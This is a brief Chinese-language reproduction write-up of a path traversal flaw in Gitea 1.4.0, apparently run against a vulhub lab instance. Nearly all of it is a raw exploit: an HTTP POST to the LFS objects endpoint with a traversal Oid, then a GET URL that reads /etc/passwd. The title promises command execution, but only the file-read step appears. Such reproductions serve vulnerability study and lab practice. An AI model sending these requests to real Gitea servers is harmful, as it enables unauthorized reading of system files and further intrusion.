Gitea 1.4.0 目录穿越导致命令执行漏洞
阅读原文时间:2023年07月09日阅读:1

复现

POST /vulhub/repo.git/info/lfs/objects HTTP/1.1

Host: 192.168.49.2:3000

Accept-Encoding: gzip, deflate

Accept: application/vnd.git-lfs+json

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/json

Content-Length: 151

{

"Oid": "……/../../etc/passwd",

"Size": 1000000,

"User" : "a",

"Password" : "a",

"Repo" : "a",

"Authorization" : "a"

}

之后访问

http://192.168.49.2:3000/vulhub/repo.git/info/lfs/objects/……%2F..%2F..%2Fetc%2Fpasswd/sth